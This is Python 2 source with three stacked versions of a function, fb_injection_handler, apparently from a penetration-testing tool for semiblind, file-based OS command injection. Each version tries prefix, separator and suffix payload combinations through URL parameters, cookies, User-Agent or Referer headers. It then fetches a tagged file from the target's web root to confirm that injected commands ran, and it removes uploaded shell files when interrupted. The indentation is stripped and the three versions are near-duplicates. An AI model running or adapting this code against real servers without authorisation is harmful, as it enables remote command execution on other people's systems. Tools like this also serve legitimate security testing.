def fb_injection_handler(url, delay, filename, http_request_method, url_time_response):
counter = 1
failed_tries = 20
vp_flag = True
exit_loops = False
no_result = True
is_encoded= False
stop_injection = False
call_tmp_based = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "file-based semiblind injection technique"
# Set temp path
if menu.options.tmp_path:
tmp_path = menu.options.tmp_path
else:
tmp_path = settings.TMP_PATH
if menu.options.file_dest and '/tmp/' in menu.options.file_dest:
call_tmp_based = True
else:
if menu.options.srv_root_dir:
settings.SRV_ROOT_DIR = menu.options.srv_root_dir
else:
# Debian/Ubunt have been updated to use /var/www/html as default instead of /var/www.
if "debian" or "ubuntu" in settings.SERVER_BANNER.lower():
try:
check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower())
if check_version[0] > "2.3":
# Add "/html" to servers root directory
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html"
else:
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR
except IndexError:
pass
# Add "/html" to servers root directory
elif "fedora" or "centos" in settings.SERVER_BANNER.lower():
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html"
else:
pass
path = urlparse.urlparse(url).path
path_parts = path.split('/')
count = 0
for part in path_parts:
count = count + 1
count = count - 1
last_param = path_parts[count]
EXTRA_DIR = path.replace(last_param, "")
settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + EXTRA_DIR
if not menu.options.verbose:
print "(*) Trying to create a file on " + settings.SRV_ROOT_DIR + "... "
else:
print "(*) Testing the "+ technique + "... "
i = 0
# Calculate all possible combinations
total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
# Check if defined alter shell
alter_shell = menu.options.alter_shell
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
i = i + 1
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = TAG + ".txt"
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
try:
# File-based decision payload (check if host is vulnerable).
if alter_shell :
payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
print "(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + settings.SRV_ROOT_DIR + "..."
print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
response = fb_injector.referer_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)
# Find the directory.
output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay)
time.sleep(delay)
try:
# Check if defined extra headers.
request = urllib2.Request(output)
headers.do_check(request)
# Evaluate test results.
output = urllib2.urlopen(request)
html_data = output.read()
shell = re.findall(r"" + TAG + "", html_data)
if len(shell) != 0 and not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... [ " + percent + " ]")
sys.stdout.flush()
except urllib2.HTTPError, e:
if e.getcode() == 404:
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if call_tmp_based == True:
exit_loops = True
tmp_path = os.path.split(menu.options.file_dest)[0] + "/"
tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response)
raise
# Show an error message, after 20 failed tries.
# Use the "/tmp/" directory for tempfile-based technique.
elif i == failed_tries and no_result == True :
if not menu.options.verbose:
print ""
print Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to write on "+ settings.SRV_ROOT_DIR + "." + Style.RESET_ALL
while True:
tmp_upload = raw_input("(?) Do you want to try the temporary directory (" + tmp_path + ") [Y/n/q] > ").lower()
if tmp_upload in settings.CHOISE_YES:
exit_loops = True
call_tfb = tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response)
if call_tfb != False:
return True
else:
if no_result == True:
return False
else:
return True
elif tmp_upload in settings.CHOISE_NO:
break
elif tmp_upload in settings.CHOISE_QUIT:
print ""
raise
else:
if tmp_upload == "":
tmp_upload = "enter"
print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL
pass
continue
else:
if exit_loops == False:
if not menu.options.verbose:
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(float_percent)+"%"
else:
percent = str(float_percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... [ " + percent + " ]")
sys.stdout.flush()
continue
else:
continue
else:
raise
elif e.getcode() == 401:
print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n"
sys.exit(0)
elif e.getcode() == 403:
print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n"
sys.exit(0)
except KeyboardInterrupt:
# Delete previous shell (text) files (output)
delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except urllib2.URLError, e:
# print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL
# Delete previous shell (text) files (output)
delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
except:
raise
def fb_injection_handler(url, delay, filename, http_request_method,
url_time_response):
counter = 1
failed_tries = 20
vp_flag = True
exit_loops = False
no_result = True
is_encoded = False
stop_injection = False
call_tmp_based = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "file-based semiblind injection technique"
# Set temp path
if menu.options.tmp_path:
tmp_path = menu.options.tmp_path
else:
tmp_path = settings.TMP_PATH
print "(*) Testing the " + technique + "... "
if menu.options.file_dest:
if '/tmp/' in menu.options.file_dest:
call_tmp_based = True
SRV_ROOT_DIR = os.path.split(menu.options.file_dest)[0]
else:
if menu.options.srv_root_dir:
SRV_ROOT_DIR = menu.options.srv_root_dir
else:
SRV_ROOT_DIR = settings.SRV_ROOT_DIR
i = 0
# Calculate all possible combinations
total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(
settings.SUFFIXES)
# Check if defined alter shell
alter_shell = menu.options.alter_shell
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
i = i + 1
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(
random.choice(string.ascii_uppercase) for i in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = TAG + ".txt"
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
try:
# File-based decision payload (check if host is vulnerable).
if alter_shell:
payload = fb_payloads.decision_alter_shell(
separator, TAG, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.decision(separator, TAG,
OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
print Fore.GREY + "(~) Payload: " + payload.replace(
"\n", "\\n") + Style.RESET_ALL
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
response = fb_injector.cookie_injection_test(
url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(
menu.options.agent)
response = fb_injector.user_agent_injection_test(
url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(
menu.options.referer)
response = fb_injector.referer_injection_test(
url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
response, vuln_parameter = fb_injector.injection_test(
payload, http_request_method, url)
# Find the directory.
path = url
path_parts = path.split('/')
count = 0
for part in path_parts:
count = count + 1
count = count - 1
last_param = path_parts[count]
output = url.replace(last_param, OUTPUT_TEXTFILE)
time.sleep(delay)
try:
# Check if defined extra headers.
request = urllib2.Request(output)
headers.do_check(request)
# Evaluate test results.
output = urllib2.urlopen(request)
html_data = output.read()
shell = re.findall(r"" + TAG + "", html_data)
if len(shell) != 0 and not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
sys.stdout.write("\r(*) Trying to upload the '" +
OUTPUT_TEXTFILE + "' on " +
SRV_ROOT_DIR + "... [ " +
percent + " ]")
sys.stdout.flush()
except urllib2.HTTPError, e:
if e.getcode() == 404:
percent = ((i * 100) / total)
if call_tmp_based == True:
exit_loops = True
tmp_path = os.path.split(
menu.options.file_dest)[0] + "/"
tfb_controller(no_result, url, delay, filename,
tmp_path, http_request_method,
url_time_response)
raise
# Show an error message, after 20 failed tries.
# Use the "/tmp/" directory for tempfile-based technique.
elif i == failed_tries:
if not menu.options.verbose:
print ""
print Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to write on " + SRV_ROOT_DIR + "." + Style.RESET_ALL
while True:
tmp_upload = raw_input(
"(?) Do you want to try the temporary directory ("
+ tmp_path + ") [Y/n] > ").lower()
if tmp_upload in settings.CHOISE_YES:
exit_loops = True
tfb_controller(no_result, url, delay,
filename, tmp_path,
http_request_method,
url_time_response)
if no_result == True:
return False
elif tmp_upload in settings.CHOISE_NO:
break
else:
if tmp_upload == "":
tmp_upload = "enter"
print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL
pass
continue
else:
if exit_loops == False:
if not menu.options.verbose:
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(percent) + "%"
else:
percent = str(percent) + "%"
sys.stdout.write(
"\r(*) Trying to upload the '" +
OUTPUT_TEXTFILE + "' on " +
SRV_ROOT_DIR + "... [ " + percent +
" ]")
sys.stdout.flush()
continue
else:
continue
else:
raise
elif e.getcode() == 401:
print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n"
sys.exit(0)
elif e.getcode() == 403:
print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n"
sys.exit(0)
except KeyboardInterrupt:
# Delete previous shell (text) files (output)
delete_previous_shell(separator, payload, TAG, prefix,
suffix, http_request_method, url,
vuln_parameter, OUTPUT_TEXTFILE,
alter_shell)
raise
except urllib2.URLError, e:
#print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL
sys.exit(0)
except:
continue
def fb_injection_handler(url, delay, filename, http_request_method):
counter = 1
vp_flag = True
exit_loops = False
no_result = True
is_encoded= False
stop_injection = False
call_tmp_based = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "file-based semiblind injection technique"
# Set temp path
if menu.options.tmp_path:
tmp_path = menu.options.tmp_path
else:
tmp_path = settings.TMP_PATH
print "(*) Testing the "+ technique + "... "
if menu.options.file_dest:
if '/tmp/' in menu.options.file_dest:
call_tmp_based = True
SRV_ROOT_DIR = os.path.split(menu.options.file_dest)[0]
else:
if menu.options.srv_root_dir:
SRV_ROOT_DIR = menu.options.srv_root_dir
else:
SRV_ROOT_DIR = settings.SRV_ROOT_DIR
i = 0
# Calculate all possible combinations
total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
# Check if defined alter shell
alter_shell = menu.options.alter_shell
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
i = i + 1
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = TAG + ".txt"
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
try:
# File-based decision payload (check if host is vulnerable).
if alter_shell :
payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)
# Find the directory.
path = url
path_parts = path.split('/')
count = 0
for part in path_parts:
count = count + 1
count = count - 1
last_param = path_parts[count]
output = url.replace(last_param, OUTPUT_TEXTFILE)
time.sleep(delay)
try:
# Check if defined extra headers.
request = urllib2.Request(output)
headers.do_check(request)
# Evaluate test results.
output = urllib2.urlopen(request)
html_data = output.read()
shell = re.findall(r"" + TAG + "", html_data)
if len(shell) != 0 and not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
sys.stdout.write("\r(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + SRV_ROOT_DIR + "... [ " + percent + " ]")
sys.stdout.flush()
except urllib2.HTTPError, e:
if e.getcode() == 404:
percent = ((i*100)/total)
if call_tmp_based == True:
exit_loops = True
tmp_path = os.path.split(menu.options.file_dest)[0] + "/"
tfb_controller(no_result, url, delay, tmp_path, filename, http_request_method)
raise
# Show an error message, after 20 failed tries.
# Use the "/tmp/" directory for tempfile-based technique.
elif i == 20 :
print "\n" + Back.RED + "(x) Error: It seems that you don't have permissions to write on "+ SRV_ROOT_DIR + "." + Style.RESET_ALL
while True:
tmp_upload = raw_input("(?) Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > ").lower()
if tmp_upload in settings.CHOISE_YES:
exit_loops = True
tfb_controller(no_result, url, delay, tmp_path, filename, http_request_method)
if no_result == True:
return False
elif tmp_upload in settings.CHOISE_NO:
break
else:
if tmp_upload == "":
tmp_upload = "enter"
print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL
pass
continue
else:
if exit_loops == False:
if not menu.options.verbose:
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
else:
percent = str(percent)+"%"
sys.stdout.write("\r(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + SRV_ROOT_DIR + "... [ " + percent + " ]")
sys.stdout.flush()
continue
else:
continue
else:
raise
elif e.getcode() == 401:
print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n"
sys.exit(0)
elif e.getcode() == 403:
print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n"
sys.exit(0)
except KeyboardInterrupt:
delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
raise
except urllib2.URLError, e:
#print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL
sys.exit(0)
except:
continue